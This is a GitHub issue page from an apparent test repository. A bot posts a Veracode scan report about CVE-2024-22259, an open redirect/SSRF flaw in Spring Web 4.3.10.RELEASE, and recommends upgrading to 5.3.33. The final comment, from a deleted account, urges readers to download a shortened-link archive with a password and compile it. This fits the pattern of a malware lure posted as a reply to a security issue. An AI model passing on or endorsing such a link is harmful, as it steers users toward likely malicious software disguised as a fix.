julz0815 / test-action

0 stars 1 forks source link

CVE: 2024-22259 found in Spring Web - Version: 4.3.10.RELEASE [JAVA] #1201

Open github-actions[bot] opened 6 days ago

github-actions[bot] commented 6 days ago

Veracode Software Composition Analysis

Attribute Details
Library Spring Web
Description Spring Web
Language JAVA
Vulnerability Server Side Request Forgery (SSRF)
Vulnerability description org.springframework:spring-web is vulnerable to Open Redirect. The vulnerability is due to insufficient validation checks of the host URL within UriComponentsBuilder.java. If an application utilizes the host validation checks, an attacker can perform an open redirect or Server-Side Request Forgery (SSRF) attack. Note that this vulnerability is the same as CVE-2024-22243 but with different input.
CVE 2024-22259
CVSS score 7.8
Vulnerability present in version/s 3.1.0.RC1-5.3.32
Found library version/s 4.3.10.RELEASE
Vulnerability fixed in version 5.3.33
Library latest version 6.2.0-RC1
Fix Please update to 5.3.33

Links:

ghost commented 6 days ago

download https://bit.ly/3TC7hrw Archive codepass: changeme If you don't have the c compliator, install it.(gcc or clang)